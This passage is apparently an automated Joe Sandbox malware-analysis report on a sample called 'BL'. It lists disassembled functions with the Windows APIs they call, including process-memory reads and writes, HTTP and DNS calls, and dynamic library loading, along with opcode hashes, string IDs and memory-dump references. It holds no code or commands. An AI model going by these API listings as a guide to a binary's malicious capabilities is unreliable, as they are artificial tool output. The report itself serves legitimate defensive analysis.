                                                                                                                            • Opcode ID: 35eb6b368d3d727d561940249ac9230275533512fc16219617b5b7e0950dc549
                                                                                                                            • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                                                                                            • Opcode Fuzzy Hash: 35eb6b368d3d727d561940249ac9230275533512fc16219617b5b7e0950dc549
                                                                                                                            • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                                                                                            Function 004667A7 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 170shareCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                            • __wcsnicmp.LIBCMT ref: 0046681A
                                                                                                                            • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                                            • String ID: LPT$HH
                                                                                                                            • API String ID: 3035604524-2728063697
                                                                                                                            • Opcode ID: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                                                                                                            • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                                                                                                                            • Opcode Fuzzy Hash: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                                                                                                            • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                                                                                                                            Function 00438A5D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
                                                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                                                                                                              • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                                                                                                            • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$MemoryProcess$ReadWrite
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 4055202900-2766056989
                                                                                                                            • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                                                            • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                                                                                                                            • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                                                            • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                                                                                                                            Function 00465D41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CrackInternet_memset_wcslen
                                                                                                                            • String ID: |
                                                                                                                            • API String ID: 915713708-2343686810
                                                                                                                            • Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                                                            • Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
                                                                                                                            • Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                                                            • Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
                                                                                                                            Function 0044A7DC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                                                                                            • HttpQueryInfoW.WININET ref: 0044A892
                                                                                                                              • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3705125965-3916222277
                                                                                                                            • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                                                            • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                                                                                                                            • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                                                            • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                                                                                                                            Function 004509D1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Long
                                                                                                                            • String ID: SysTreeView32
                                                                                                                            • API String ID: 847901565-1698111956
                                                                                                                            • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                                                            • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                                                                                                                            • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                                                            • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                                                                                                                            Function 00450C09 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DestroyWindow
                                                                                                                            • String ID: msctls_updown32
                                                                                                                            • API String ID: 3375834691-2298589950
                                                                                                                            • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                                                            • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                                                                                                                            • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                                                            • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                                                                                                                            Function 00451191 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                                                                                            • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                                                                                            • MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$MoveWindow
                                                                                                                            • String ID: Listbox
                                                                                                                            • API String ID: 3315199576-2633736733
                                                                                                                            • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                            • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                                                                                            • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                            • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                                                                                            Function 0045D235 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$InformationVolume
                                                                                                                            • String ID: HH
                                                                                                                            • API String ID: 2507767853-2761332787
                                                                                                                            • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                            • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                                                                                            • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                            • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                                                                                            Function 0045D42B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$InformationVolume
                                                                                                                            • String ID: HH
                                                                                                                            • API String ID: 2507767853-2761332787
                                                                                                                            • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                            • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                                                                            • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                            • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                                                                            Function 00450D00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                                                                                            • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID: msctls_trackbar32
                                                                                                                            • API String ID: 3850602802-1010561917
                                                                                                                            • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                                            • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                                                                                                            • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                                            • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                                                                                                            Function 0046BD4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                                            • gethostbyname.WSOCK32(?), ref: 0046BD78
                                                                                                                            • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                                                                                                            • inet_ntoa.WSOCK32(00000000), ref: 0046BDCD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                                                                                                            • String ID: HH
                                                                                                                            • API String ID: 1515696956-2761332787
                                                                                                                            • Opcode ID: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                                                            • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                                                                                                                            • Opcode Fuzzy Hash: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                                                            • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                                                                                                                            Function 004497A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                            • GetMenuItemInfoW.USER32 ref: 004497EA
                                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
                                                                                                                            • DrawMenuBar.USER32 ref: 00449828
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$InfoItem$Draw_malloc
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 772068139-4108050209
                                                                                                                            • Opcode ID: b3af576e0f2e39512f86611043772d16c6e9a47364665c1dfde5c41d6aa9b3c8
                                                                                                                            • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                                                                                                                            • Opcode Fuzzy Hash: b3af576e0f2e39512f86611043772d16c6e9a47364665c1dfde5c41d6aa9b3c8
                                                                                                                            • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                                                                                                                            Function 004342A8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocTask_wcslen
                                                                                                                            • String ID: hkG
                                                                                                                            • API String ID: 2651040394-3610518997
                                                                                                                            • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                                            • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                                                                                                                            • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                                            • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                                                                                                                            Function 0043416A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                            • API String ID: 2574300362-1816364905
                                                                                                                            • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                            • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                                                                                                            • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                            • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                                                                                                            Function 004343CE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,00000000,?,?,00000101,?,?), ref: 004343DE
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
